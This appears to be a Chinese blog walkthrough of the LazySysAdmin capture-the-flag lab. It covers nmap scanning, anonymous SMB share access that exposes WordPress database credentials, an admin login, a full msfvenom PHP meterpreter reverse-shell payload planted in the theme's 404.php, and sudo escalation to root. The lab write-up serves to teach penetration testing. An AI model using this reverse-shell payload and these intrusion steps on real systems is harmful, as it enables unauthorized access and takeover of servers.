工具

靶机
kali linux

操作步骤

SMB介绍
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Inter)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为Samba。

SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445

SMB协议,计算机可以访问网络资源,下载对应的资源文件

IP扫描

netdisconver -r 192.168.2.1/24

结果:

在这里插入图片描述
靶场IP:192.168.2.140

信息探测

探测开放服务

root@kali:~# nmap -sV 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:46 EDT
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.0016s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds

探测全部信息
注:-T4 指的是有4个进程

root@kali:~# nmap -A -v -T4 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:47 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating ARP Ping Scan at 10:47
Scanning 192.168.2.140 [1 port]
Completed ARP Ping Scan at 10:47, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:47
Completed Parallel DNS resolution of 1 host. at 10:47, 0.00s elapsed
Initiating SYN Stealth Scan at 10:47
Scanning LazySysAdmin.lan (192.168.2.140) [1000 ports]
Discovered open port 3306/tcp on 192.168.2.140
Discovered open port 80/tcp on 192.168.2.140
Discovered open port 139/tcp on 192.168.2.140
Discovered open port 22/tcp on 192.168.2.140
Discovered open port 445/tcp on 192.168.2.140
Discovered open port 6667/tcp on 192.168.2.140
Completed SYN Stealth Scan at 10:47, 0.22s elapsed (1000 total ports)
Initiating Service scan at 10:47
Scanning 6 services on LazySysAdmin.lan (192.168.2.140)
Completed Service scan at 10:47, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against LazySysAdmin.lan (192.168.2.140)
NSE: Script scanning 192.168.2.140.
Initiating NSE at 10:47
Completed NSE at 10:47, 10.18s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.00090s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.2.165
|_  error: Closing link: (nmap@192.168.2.165) [Client exited]
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.004 days (since Sat Aug 17 10:41:48 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h19m59s, deviation: 5h46m24s, median: 0s
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   LAZYSYSADMIN<00>     Flags: <unique><active>
|   LAZYSYSADMIN<03>     Flags: <unique><active>
|   LAZYSYSADMIN<20>     Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-08-18T00:47:39+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-17 10:47:39
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.90 ms LazySysAdmin.lan (192.168.2.140)

NSE: Script Post-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.91 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.302KB)

我们先进入该网站查看一下相关信息
在这里插入图片描述
一番浏览,没有任何有用的信息

接下来我们开始尝试对相关开放的服务进行分析,我们发现有22,139,445,33060,80,6667这几个端口开放

我们先从大于1024的端口入手

在Firefox中输入http://192.168.2.140:6667/,进入该网页
在这里插入图片描述
结果,没有任何信息。接下来我们尝试分析其它服务

针对SMB协议弱点分析

1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

smbclient -L IP //查看SMB文件目录
smbclient '\\IP\$share' //查看SMB文件
get 敏感文件 //下载文件

2.针对SMB协议远程溢出漏洞进行分析;

searchsploit samba版本号 //搜索smb远程溢出漏洞

我们先查看一下SMB文件目录

root@kali:~# smbclient -L 192.168.2.140
Enter WORKGROUP\root's password: 

我们发现有密码,我们尝试一下空口令登陆

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            

登陆成功,接下来我们尝试进行深入探测。
我们进入print$文件
在这里插入图片描述

登陆失败,进入share$文件
在这里插入图片描述
登陆成功,我们看一下目录
在这里插入图片描述

退出share$文件,我们查看一下IPC $文件
在这里插入图片描述

登陆成功,但里面没有任何信息,这时我们进入share$文件,查找敏感信息。
我们下载deets.txt, robots.txt, todolist.txt文件。然后我们进入wordpress文件夹查看相关内容

smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \> get robots.txt
getting file \robots.txt of size 92 as robots.txt (18.0 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (15.4 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> cd wordpress
smb: \wordpress\> ls
  .                                   D        0  Sat Aug 17 06:35:47 2019
  ..                                  D        0  Tue Aug 15 07:05:52 2017
  wp-config-sample.php                N     2853  Wed Dec 16 04:58:26 2015
  wp-trackback.php                    N     4513  Fri Oct 14 15:39:28 2016
  wp-admin                            D        0  Wed Aug  2 17:02:02 2017
  wp-settings.php                     N    16200  Thu Apr  6 14:01:42 2017
  wp-blog-header.php                  N      364  Sat Dec 19 06:20:28 2015
  index.php                           N      418  Tue Sep 24 20:18:11 2013
  wp-cron.php                         N     3286  Sun May 24 13:26:25 2015
  wp-links-opml.php                   N     2422  Sun Nov 20 21:46:30 2016
  readme.html                         N     7413  Sat Aug 17 06:35:47 2019
  wp-signup.php                       N    29924  Tue Jan 24 06:08:42 2017
  wp-content                          D        0  Sat Aug 17 06:52:24 2019
  license.txt                         N    19935  Sat Aug 17 06:35:47 2019
  wp-mail.php                         N     8048  Wed Jan 11 00:13:43 2017
  wp-activate.php                     N     6864  Sat Aug 17 06:35:47 2019
  .htaccess                           H       35  Tue Aug 15 07:40:13 2017
  xmlrpc.php                          N     3065  Wed Aug 31 12:31:29 2016
  wp-login.php                        N    34347  Sat Aug 17 06:35:47 2019
  wp-load.php                         N     3301  Mon Oct 24 23:15:30 2016
  wp-comments-post.php                N     1627  Mon Aug 29 08:00:32 2016
  wp-config.php                       N     3703  Mon Aug 21 05:25:14 2017
  wp-includes                         D        0  Wed Aug  2 17:02:03 2017

		3029776 blocks of size 1024. 1452424 blocks available
smb: \wordpress\> 

我们发现了wp-config.php文件,我们下载下来

我们逐个查看文件,看看有没有有用的信息。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

root@kali:~# gedit wp-config.php

在这里插入图片描述

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT',       'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

我们在deets.txt文件中发现了一个password:12345

我们在wp-config.php文件中发现了mysql的username和password。

我们也知道靶机开放3306端口,所以我们可以尝试一下远程连接。
在这里插入图片描述
我们发现,该服务器不允许数据库远程连接。

我们再尝试一下漏洞查询

root@kali:~# searchsploit smbd 3.X - 4.X
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit smbd 4.3.11-Ubuntu
Exploits: No Result
Shellcodes: No Result

我们没有找到任何漏洞。我可以再尝试一下ssh连接
在这里插入图片描述
密码输入的就是wp-config.php中爆出来的password和deets.txt爆出来的password。

Admin@192.168.2.140's password: 
Permission denied, please try again.
Admin@192.168.2.140's password: 
Permission denied, please try again.

结果依旧不尽人意。
那我们就只好去扫描一下目录了

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
3.寻找突破点,目标登陆后台,上传webshell;

在dirb扫描中我们发现了敏感文件
在这里插入图片描述
打开该链接

在这里插入图片描述
我们进入了该网站的后台,输入mysql中爆出来的username和password。
在这里插入图片描述
我们进入了后台。
制作webshell
制作方法

msfvenom -p php/meterpreter/reverse_tcp lhost=kali_ip lport=4444 -f raw
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.165 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.2.165'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

我们把源代码去掉注释,复制到文件中生成webshell
在这里插入图片描述

启动监听
启动metasploit
然后启动监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.2.140
lhost => 192.168.2.140
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.140    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[-] Handler failed to bind to 192.168.2.140:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 

现在,kali正在监听靶机的4444端口。

接下来,我们上传webshell

上传webshell

使用找到的敏感信息登陆系统后台,上传webshell。执行webshell(访问具有webshell的php页面)

获得反弹的shell
wordpress 上传点 theme 404.php
执行:http://ip_address/wordpress/wp-content/themes/twentyfifteen/404.php(稍后讲解)

我们打开Firefox,进入后台

点击在这里插入图片描述,再点击Editor

页面如下:
在这里插入图片描述
点击旁边的404-Template,将源代码粘贴上去,然后点击update File按钮。

点击完毕后,会出现以下结果:
在这里插入图片描述
编辑成功。接下来,我们进入webshell。

输入:http://192.168.2.140/wordpress/wp-content/themes/twentyfifteen/404.php,我们发现msf这边有反应
在这里插入图片描述
我们查看当前用户
在这里插入图片描述
我们发现,终端不识别id,那么我们就用shell
进入shell后,我们先查看当前目录

meterpreter > shell
Process 1521 created.
Channel 0 created.
ls
404.php
archive.php
author-bio.php
comments.php
content-link.php
content-none.php
content-page.php
content-search.php
content.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
page.php
readme.txt
rtl.css
screenshot.png
search.php
sidebar.php
single.php
style.css

我们把shell改成终端形式
在这里插入图片描述
我们查看一下用户信息
我们发现有一个在/home中的用户
在这里插入图片描述
我们切换成该用户
在这里插入图片描述
这里需要密码,我们可以试一下deets.txt文件中的密码

成功进入

这时我们查看一下目录
在这里插入图片描述
我们发现cd命令受限

我们尝试一下切换到root

我们先列出togie用户的权限

sudo -l
togie@LazySysAdmin:/var/www/html/wordpress/wp-content/themes/twentyfifteen$ sudo -l
</html/wordpress/wp-content/themes/twentyfifteen$ sudo -l                    
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL

-l, –list 列出用户权限或检查某个特定命令;对于长格式,使用两次

在这里插入图片描述
我们发现该用户可以切换成root
在这里插入图片描述
切换成功,接下来我们寻找flag

root@LazySysAdmin:~# ls
ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

(按理说proof应该就是flag,我也很尴尬)

总结

对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。

一般情况下flag值都在/root目录下,并且需要提升root权限才能查看内容;

Logo

更多推荐